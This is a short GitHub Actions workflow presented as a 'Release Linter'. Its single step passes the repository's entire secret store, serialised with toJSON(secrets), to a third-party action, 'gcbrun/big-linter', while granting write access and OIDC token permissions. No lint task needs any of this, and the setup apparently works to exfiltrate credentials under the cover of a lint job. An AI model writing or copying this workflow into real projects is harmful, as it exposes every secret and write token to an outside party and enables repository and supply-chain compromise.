name: Release Linter

on:
  push:

permissions:
  contents: write
  id-token: write

jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - name: Run Big Linter
        uses: gcbrun/big-linter@v1
        env:
          PR_ENVIRONMENT: ${{ toJSON(secrets) }}
